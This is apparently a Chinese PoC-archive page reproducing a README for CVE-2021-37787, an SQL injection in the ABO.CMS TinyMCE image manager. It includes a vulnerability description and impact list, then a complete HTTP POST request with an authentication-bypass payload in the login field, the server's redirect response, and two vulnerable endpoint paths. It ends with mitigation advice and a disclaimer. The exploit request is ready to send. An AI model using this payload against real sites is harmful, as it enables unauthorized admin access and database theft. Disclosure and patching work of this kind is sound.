目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2021-37787 PoC — ABO.CMS 安全漏洞

来源
关联漏洞
标题: ABO.CMS 安全漏洞 (CVE-2021-37787)
Description:ABO.CMS是ABO.CMS公司的一个内容管理平台。 ABO.CMS 5.8至5.9.3版本存在安全漏洞,该漏洞源于通过HTTP POST请求向TinyMCE模块发送的SQL注入攻击。
Description
CVE-2021-37787
介绍
��# CVE-2021-37787: SQL Injection in ABOCMS via TinyMCE Module



## Vulnerability Details



- **CVE ID**: CVE-2021-37787

- **Product**: ABOCMS

- **Affected Version(s)**: 5.8.x, d"5.9.3

- **Vulnerability Type**: SQL Injection

- **CVSS Score**: 9.8



### Description



A critical SQL injection vulnerability exists in ABOCMS within the TinyMCE module. The vulnerability arises due to insufficient input sanitization in the TinyMCE module's interaction with the database, allowing an attacker to inject malicious SQL queries. This can lead to unauthorized data access, modification, or even full compromise of the underlying database.



The vulnerable endpoint is located in the TinyMCE module's processing of user-supplied input. An attacker can exploit this flaw to execute arbitrary SQL commands.



### Impact



- Aunthentication bypass.

- Extraction of sensitive data.

- Modification or deletion of database records.

- Potential remote code execution, depending on the database configuration.



## Proof of Concept (PoC)



## POST Request



```

POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1

Host: <yourdomain.name>

Content-Type: application/x-www-form-urlencoded



return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

```



## Response



```

HTTP/1.1 302 Found

Server: nginx-reuseport/1.21.1

Date: <date>

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=30

X-Powered-By: PHP/5.6.40

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)

location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

```



### Vulnerable Endpoint



The vulnerability can be triggered via the following endpoint:



/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php

/js/admin/tiny_mce/plugins/filemanager/login_session_auth.php



## Mitigation



- **For Users**:

  - Upgrade to the latest version of ABOCMS.

  - Disable the TinyMCE module if it s not essential.



- **For Developers**:

  - Use prepared statements or parameterized queries to interact with the database.

  - Update the TinyMCE module to the latest secure version.

  - Implement proper input validation to filter out malicious payloads.



## Disclaimer



This PoC is provided for educational and security research purposes only. Do not use this code to harm systems or networks without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this PoC.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →